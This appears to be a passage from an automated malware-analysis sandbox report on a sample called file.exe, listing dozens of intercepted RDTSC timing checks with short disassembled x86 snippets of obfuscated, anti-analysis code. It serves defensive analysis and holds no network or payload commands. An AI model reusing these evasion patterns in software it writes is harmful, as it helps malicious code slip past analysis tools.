                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFBB04 second address: DFBB6D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F66B1272F58h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 push 00000000h 0x00000024 mov edi, 42A67AA7h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007F66B1272F58h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 mov si, A5DCh 0x00000049 xchg eax, ebx 0x0000004a pushad 0x0000004b jnp 00007F66B1272F58h 0x00000051 pushad 0x00000052 jg 00007F66B1272F56h 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFDFE6 second address: DFDFEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFDFEA second address: DFDFEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFDFEE second address: DFDFF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF06F second address: DFF073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF073 second address: DFF08C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B07B4FAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF08C second address: DFF091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF091 second address: DFF0F7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F66B07B4FA8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jns 00007F66B07B4FACh 0x00000013 push 00000000h 0x00000015 mov dword ptr [ebp+122D2F38h], ebx 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebx 0x00000020 call 00007F66B07B4FA8h 0x00000025 pop ebx 0x00000026 mov dword ptr [esp+04h], ebx 0x0000002a add dword ptr [esp+04h], 00000019h 0x00000032 inc ebx 0x00000033 push ebx 0x00000034 ret 0x00000035 pop ebx 0x00000036 ret 0x00000037 mov dword ptr [ebp+122D18D2h], edi 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F66B07B4FB9h 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFFFCB second address: DFFFE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F66B1272F69h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFFFE9 second address: E0001B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 add di, FB53h 0x0000000d push 00000000h 0x0000000f and bx, 9908h 0x00000014 push 00000000h 0x00000016 mov dword ptr [ebp+12459987h], eax 0x0000001c xchg eax, esi 0x0000001d jnl 00007F66B07B4FB0h 0x00000023 push eax 0x00000024 push ecx 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0001B second address: E00021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0200C second address: E0205D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B07B4FB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b movsx ebx, dx 0x0000000e push 00000000h 0x00000010 mov dword ptr [ebp+122D36ADh], eax 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007F66B07B4FA8h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 0000001Bh 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 mov bl, 4Bh 0x00000034 push eax 0x00000035 push ecx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E01090 second address: E01096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E01096 second address: E0109A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0109A second address: E0109E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E04069 second address: E0409D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F66B07B4FB4h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e jmp 00007F66B07B4FB7h 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0409D second address: E040A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0532B second address: E05330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E070EB second address: E070F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E071AD second address: E071B2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E090F1 second address: E090F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E090F5 second address: E09107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F66B07B4FA6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E09107 second address: E0910D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0910D second address: E0918F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F66B07B4FA8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F66B07B4FA8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D3145h], ebx 0x0000002b push 00000000h 0x0000002d jp 00007F66B07B4FACh 0x00000033 mov edi, dword ptr [ebp+124570E0h] 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push eax 0x0000003e call 00007F66B07B4FA8h 0x00000043 pop eax 0x00000044 mov dword ptr [esp+04h], eax 0x00000048 add dword ptr [esp+04h], 00000016h 0x00000050 inc eax 0x00000051 push eax 0x00000052 ret 0x00000053 pop eax 0x00000054 ret 0x00000055 xchg eax, esi 0x00000056 jno 00007F66B07B4FB8h 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0918F second address: E0919A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F66B1272F56h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0A119 second address: E0A11D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E073CE second address: E073D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E073D4 second address: E073DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F66B07B4FA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E073DE second address: E07418 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B1272F5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F66B1272F64h 0x00000014 jmp 00007F66B1272F60h 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E07418 second address: E0741E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0741E second address: E07422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E09353 second address: E0935C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E08418 second address: E0841C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0841C second address: E08420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0BF81 second address: E0BFA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F66B1272F5Dh 0x0000000b popad 0x0000000c push eax 0x0000000d jo 00007F66B1272F60h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E062A7 second address: E062AD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0A2A1 second address: E0A2A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E062AD second address: E062EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B07B4FB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F66B07B4FB7h 0x00000012 jne 00007F66B07B4FA6h 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0CFA2 second address: E0CFA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0CFA6 second address: E0D00E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F66B07B4FB8h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F66B07B4FA8h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b mov edi, ebx 0x0000002d mov dword ptr [ebp+122D35C0h], edi 0x00000033 push 00000000h 0x00000035 mov ebx, dword ptr [ebp+122D369Bh] 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F66B07B4FB2h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E128E2 second address: E128F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 js 00007F66B1272F64h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E16D1F second address: E16D3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B07B4FB8h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E16D3F second address: E16D43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E16EB7 second address: E16EBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E16EBC second address: E16EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66B1272F5Ch 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F66B1272F5Ch 0x00000014 jmp 00007F66B1272F65h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E16EF2 second address: E16F09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F66B07B4FB3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E16F09 second address: E16F0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E17058 second address: E1705E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1705E second address: E17062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E17062 second address: E17066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E17066 second address: E1706C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1706C second address: E17076 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F66B07B4FACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E18EDB second address: E18EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E18EE1 second address: E18EE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E18EE7 second address: E18EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E18EEC second address: E18F12 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F66B07B4FB0h 0x00000008 jmp 00007F66B07B4FAEh 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E18F12 second address: E18F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66B1272F67h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAFC3D second address: DAFC47 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F66B07B4FACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1EA9B second address: E1EAA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1EAA3 second address: E1EAE5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F66B07B4FB9h 0x00000008 jmp 00007F66B07B4FAAh 0x0000000d pop ecx 0x0000000e push eax 0x0000000f jmp 00007F66B07B4FB8h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAAA41 second address: DAAA45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1F25B second address: E1F25F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1F25F second address: E1F273 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F66B1272F5Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1F273 second address: E1F2A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F66B07B4FB4h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 jmp 00007F66B07B4FAFh 0x00000017 pop eax 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1F479 second address: E1F47E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1F47E second address: E1F488 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F66B07B4FACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1F488 second address: E1F4B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F66B1272F61h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F66B1272F5Dh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1F4B5 second address: E1F4C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B07B4FAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1F4C8 second address: E1F502 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F66B1272F67h 0x00000014 jmp 00007F66B1272F63h 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E26056 second address: E2607B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B07B4FB6h 0x00000007 jo 00007F66B07B4FA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E24C5C second address: E24C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E24C60 second address: E24C7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B07B4FB9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E24C7D second address: E24CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F66B1272F67h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F66B1272F58h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E252D0 second address: E252D5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E25579 second address: E25595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F66B1272F64h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E25595 second address: E2559D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E256FF second address: E25703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E25703 second address: E25714 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E25874 second address: E2587A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E259E9 second address: E25A27 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F66B07B4FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b jo 00007F66B07B4FE2h 0x00000011 jns 00007F66B07B4FC0h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F66B07B4FABh 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E25BB8 second address: E25BD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B1272F63h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E25D4F second address: E25D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E25D55 second address: E25D59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E25D59 second address: E25D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB66BF second address: DB66FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B1272F5Eh 0x00000007 jmp 00007F66B1272F5Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F66B1272F69h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB66FA second address: DB66FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2B58A second address: E2B5A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F66B1272F56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jns 00007F66B1272F56h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2B5A0 second address: E2B5A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2B5A6 second address: E2B5AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2B5AA second address: E2B5EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F66B07B4FAFh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e jnl 00007F66B07B4FAEh 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007F66B07B4FA6h 0x0000001c jmp 00007F66B07B4FB4h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2B5EC second address: E2B5F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2B5F0 second address: E2B5F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2B721 second address: E2B725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
